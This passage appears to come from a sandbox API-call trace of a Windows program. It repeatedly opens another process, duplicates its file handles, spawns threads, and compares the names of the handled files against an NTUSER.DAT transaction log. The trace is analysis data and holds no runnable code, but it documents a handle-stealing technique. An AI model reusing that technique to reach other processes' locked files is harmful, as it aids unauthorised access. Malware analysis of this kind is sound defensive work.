_Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -2 [0162.975] CloseHandle (hObject=0x194) returned 1 [0162.975] CloseHandle (hObject=0x1e8) returned 1 [0162.975] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.975] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.976] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.976] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.977] CloseHandle (hObject=0x1e4) returned 1 [0162.977] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0162.977] CloseHandle (hObject=0x194) returned 1 [0162.977] CloseHandle (hObject=0x1e8) returned 1 [0162.977] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.977] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.978] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.978] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.979] CloseHandle (hObject=0x1e4) returned 1 [0162.979] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -5 [0162.979] CloseHandle (hObject=0x194) returned 1 [0162.979] CloseHandle (hObject=0x1e8) returned 1 [0162.979] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.979] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.980] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.981] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.981] CloseHandle (hObject=0x1e4) returned 1 [0162.981] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.981] CloseHandle (hObject=0x194) returned 1 [0162.981] CloseHandle (hObject=0x1e8) returned 1 [0162.981] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.981] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.982] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.983] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.983] CloseHandle (hObject=0x1e4) returned 1 [0162.983] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.983] CloseHandle (hObject=0x194) returned 1 [0162.983] CloseHandle (hObject=0x1e8) returned 1 [0162.983] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.983] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.984] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.985] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.985] CloseHandle (hObject=0x1e4) returned 1 [0162.985] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.985] CloseHandle (hObject=0x194) returned 1 [0162.985] CloseHandle (hObject=0x1e8) returned 1 [0162.985] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.985] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.985] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.986] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.986] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.987] CloseHandle (hObject=0x1e4) returned 1 [0162.987] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.987] CloseHandle (hObject=0x194) returned 1 [0162.987] CloseHandle (hObject=0x1e8) returned 1 [0162.987] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.987] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.987] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.988] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.988] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.988] CloseHandle (hObject=0x1e4) returned 1 [0162.988] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0162.989] CloseHandle (hObject=0x194) returned 1 [0162.989] CloseHandle (hObject=0x1e8) returned 1 [0162.989] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.989] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.990] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.990] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.990] CloseHandle (hObject=0x1e4) returned 1 [0162.991] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0162.991] CloseHandle (hObject=0x194) returned 1 [0162.991] CloseHandle (hObject=0x1e8) returned 1 [0162.991] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.991] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.991] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.992] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.992] CloseHandle (hObject=0x1e4) returned 1 [0162.992] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0162.992] CloseHandle (hObject=0x194) returned 1 [0162.992] CloseHandle (hObject=0x1e8) returned 1 [0162.992] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.992] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.993] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.994] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.994] CloseHandle (hObject=0x1e4) returned 1 [0162.994] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0162.994] CloseHandle (hObject=0x194) returned 1 [0162.994] CloseHandle (hObject=0x1e8) returned 1 [0162.994] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.994] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.995] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.996] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.996] CloseHandle (hObject=0x1e4) returned 1 [0162.996] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0162.996] CloseHandle (hObject=0x194) returned 1 [0162.996] CloseHandle (hObject=0x1e8) returned 1 [0162.996] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.997] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.998] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.999] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.999] CloseHandle (hObject=0x1e4) returned 1 [0162.999] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0162.999] CloseHandle (hObject=0x194) returned 1 [0162.999] CloseHandle (hObject=0x1e8) returned 1 [0162.999] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0162.999] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x554, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.000] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.001] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.001] CloseHandle (hObject=0x1e4) returned 1 [0163.001] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.001] CloseHandle (hObject=0x194) returned 1 [0163.001] CloseHandle (hObject=0x1e8) returned 1 [0163.001] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.001] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.001] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.002] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.002] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.002] CloseHandle (hObject=0x1e4) returned 1 [0163.003] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.003] CloseHandle (hObject=0x194) returned 1 [0163.003] CloseHandle (hObject=0x1e8) returned 1 [0163.003] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.003] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x58c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.003] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.004] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.004] CloseHandle (hObject=0x1e4) returned 1 [0163.004] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.004] CloseHandle (hObject=0x194) returned 1 [0163.005] CloseHandle (hObject=0x1e8) returned 1 [0163.005] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.005] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.005] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.005] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.006] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.006] CloseHandle (hObject=0x1e4) returned 1 [0163.006] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.006] CloseHandle (hObject=0x194) returned 1 [0163.006] CloseHandle (hObject=0x1e8) returned 1 [0163.006] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.007] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.007] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.007] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.008] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.008] CloseHandle (hObject=0x1e4) returned 1 [0163.008] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0163.008] CloseHandle (hObject=0x194) returned 1 [0163.008] CloseHandle (hObject=0x1e8) returned 1 [0163.008] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.009] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.009] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.010] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.010] CloseHandle (hObject=0x1e4) returned 1 [0163.010] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.010] CloseHandle (hObject=0x194) returned 1 [0163.010] CloseHandle (hObject=0x1e8) returned 1 [0163.011] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.011] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.012] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.012] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.012] CloseHandle (hObject=0x1e4) returned 1 [0163.012] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.012] CloseHandle (hObject=0x194) returned 1 [0163.013] CloseHandle (hObject=0x1e8) returned 1 [0163.013] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.013] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.014] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.014] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.015] CloseHandle (hObject=0x1e4) returned 1 [0163.015] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -12 [0163.015] CloseHandle (hObject=0x194) returned 1 [0163.015] CloseHandle (hObject=0x1e8) returned 1 [0163.015] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.015] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.015] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.016] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.016] CloseHandle (hObject=0x1e4) returned 1 [0163.016] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.016] CloseHandle (hObject=0x194) returned 1 [0163.016] CloseHandle (hObject=0x1e8) returned 1 [0163.016] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.016] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.017] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.018] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.018] CloseHandle (hObject=0x1e4) returned 1 [0163.018] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.018] CloseHandle (hObject=0x194) returned 1 [0163.018] CloseHandle (hObject=0x1e8) returned 1 [0163.018] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.018] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.018] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.019] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.020] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.020] CloseHandle (hObject=0x1e4) returned 1 [0163.020] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.020] CloseHandle (hObject=0x194) returned 1 [0163.020] CloseHandle (hObject=0x1e8) returned 1 [0163.020] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.020] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.021] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.021] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.021] CloseHandle (hObject=0x1e4) returned 1 [0163.022] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0163.022] CloseHandle (hObject=0x194) returned 1 [0163.022] CloseHandle (hObject=0x1e8) returned 1 [0163.022] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0163.022] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.022] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.024] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.025] CloseHandle (hObject=0x1e4) returned 1 [0163.025] _wcsicmp (_Str1="\\thumbcache_idx.db", 